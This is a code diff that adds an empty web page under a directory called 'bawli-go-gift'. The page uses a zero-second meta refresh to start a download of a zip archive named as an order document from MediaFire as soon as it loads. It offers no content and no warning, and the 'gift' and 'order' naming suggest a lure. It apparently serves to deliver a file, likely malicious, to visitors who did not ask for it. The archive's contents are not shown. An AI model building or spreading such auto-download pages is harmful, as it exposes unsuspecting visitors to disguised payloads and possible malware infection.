--- a/bawli-go-gift/index.html
+++ b/bawli-go-gift/index.html
@@ -1,1 +1,16 @@
-https://download1338.mediafire.com/kg7xmof8jnqg/spytel3hxl31uyj/DN-order.152-5dec21.zip
+
+
+<!DOCTYPE html>
+<html>
+<head>
+	
+<meta http-equiv="refresh" content="0; url=https://download1338.mediafire.com/kg7xmof8jnqg/spytel3hxl31uyj/DN-order.152-5dec21.zip">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body>
+
+
+
+	
+</body>
+</html>
